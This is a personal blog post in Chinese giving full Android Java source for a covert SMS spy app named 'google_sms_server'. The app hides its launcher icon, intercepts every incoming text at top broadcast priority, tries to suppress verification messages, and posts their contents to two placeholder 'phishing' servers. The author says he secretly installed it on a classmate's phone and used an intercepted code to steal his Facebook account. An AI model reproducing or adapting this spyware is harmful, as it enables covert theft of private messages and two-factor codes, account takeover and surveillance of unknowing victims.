Android Java SMS Spy
No Comments

更新於 2018-03-28 12:23:37

====2015/11/20====

這是我很久以前寫的秘密程式,我當下就很想發表,我有很多都很想發表到我網站,但因網站主機是臨時的,將來還要再次轉移,故我就荒廢了網站整整兩個月(我是指不發文,並非我不管理),現在轉移完畢,意味著我將會再次發文。

================

※純測試,不做非法用途。

首先,因為這程式很兩極化,既可以合法也可以非法,講好聽點就是自動同步SMS訊息到網站上,講難聽點,竊取用戶SMS訊息。

腦筋轉得不夠快的人可能不明白這意味著什麼,只要裝了我寫的程式,就會被我盜光所有帳號。

開發緣由:因為我同學不相信「手機防毒軟體掃描不出病毒」,所以我向他放話,我寫的程式,防毒絕對掃不到。

因為我避免用戶發現這個祕密程式,所以我取名為google_sms_server。到時候要查就很困難。

<application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme" >
        <activity android:name=".MainActivity" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <receiver
            android:name=".SmsCloudBackup"
            android:enabled="true"
            android:exported="true" >
            <intent-filter android:priority="999999999" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>

    </application>

設置 SMS_RECEIVED廣播,備註要記得添加權限,並把優先級別設定為最高級別。

package com.google.google_sms_server;

import android.app.Activity;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.widget.Toast;

public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        //setContentView(R.layout.activity_main);
        PackageManager p = getPackageManager();
        p.setComponentEnabledSetting(getComponentName(), PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);//設定隱藏在Launcher中

        Toast.makeText(this,"Google SMS Backup Service運作中",Toast.LENGTH_LONG).show();
        this.finish();
    }

}

package com.google.google_sms_server;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.AsyncTask;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.util.Log;

import org.apache.http.NameValuePair;
import org.apache.http.client.HttpClient;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;

import java.util.ArrayList;
import java.util.List;

public class SmsCloudBackup extends BroadcastReceiver {

    private String TAG = SmsCloudBackup.class.getSimpleName();
    public SmsCloudBackup() {

    }

    @Override
    public void onReceive(Context context, Intent intent) {
        // Get the data (SMS data) bound to intent
        Bundle bundle = intent.getExtras();
        String str = "";
        SmsMessage[] msgs = null;

        if (bundle != null) {
            Object[] pdus = (Object[]) bundle.get("pdus");
            msgs = new SmsMessage[pdus.length];

            for (int i=0; i < msgs.length; i++) {
                msgs[i] = SmsMessage.createFromPdu((byte[]) pdus[i]);
                str += "SMS from " + msgs[i].getOriginatingAddress() + " : ";
                str += msgs[i].getMessageBody().toString();
                str += "\n";
            }

            if (str.contains("驗證") || str.toLowerCase().contains("verif")){
                Log.d(TAG, "ABORT");
                this.abortBroadcast();//截斷用戶訊息,讓用戶察覺不到驗證訊息。實際上測試,似乎沒有效果。
            }

            Log.d(TAG, str);
            String aa= "";
            try{
                aa=java.net.URLEncoder.encode(str,"utf-8");
            }catch (Exception ex){

            }
            new ExcuteAsyncTaskOperation().execute(aa);

        }

    }

    public class ExcuteAsyncTaskOperation extends AsyncTask<String, String, String> {
        //異線任務,執行網路動作都要這樣。
        @Override
        protected String doInBackground(String... parr) {
            //進行背景工作,如「Network」,並可轉發值。
            //在迴圈中使用publishProgress((onProgressUpdate引數類別)變數);以傳遞資料。
            //例如publishProgress((int)50);

            HttpClient httpclient = new DefaultHttpClient();
            //我POST訊息至兩個釣魚網站。
            HttpPost httppost = new HttpPost("http://網站/post/post.php?u=SMS&c=" + parr[0]);
            HttpPost httppost2 = new HttpPost("http://網站2/post/post.php?u=SMS&c=" + parr[0]);
            try {
                List<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>(1);
                nameValuePairs.add(new BasicNameValuePair("u", "SMS"));
                nameValuePairs.add(new BasicNameValuePair("c", parr[0]));
                httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));
                httpclient.execute(httppost);
                httpclient.execute(httppost2);
            } catch (Exception ex) {
                Log.d(TAG, "ERROR!!!!!!!!!!!!!!!!!!!!!" + ex.toString());
            }
            return "";
        }

    }

}

這樣,當用戶安裝完成,並執行後,此程式會從Launcher上消失,意思是找不到此程式的連結,並且會關閉此程式,得去 設定=>應用程式 才可能看到,但我已經取名為google什麼的,用戶很難察覺。

實作結果:

我祕密的裝在同學手機上,在他未察覺的情況下,進行這測試。事後他非常不爽,不過最後他還是原諒我了。

從釣魚網站,取得FB驗證碼。成功盜走FB帳號。

This entry was posted in Android, General, Java, The Internet, Note By Weil Jimmer.

About Weil Jimmer

Hi! Everyone! My name is Weil Jimmer. This is my personal blog. I'm a webmaster of this site. I hope the site will be popular. Now, Let's go! Enjoy gaining more knowledge.
More Details About Me : https://weils.net/profile.php

Leave a message.
Only the first 10 comment will show.

White Birch Forum © Copyright

©2010-2017 W.B.F. All Rights Reserved.

Weil Jimmer Web PHP Script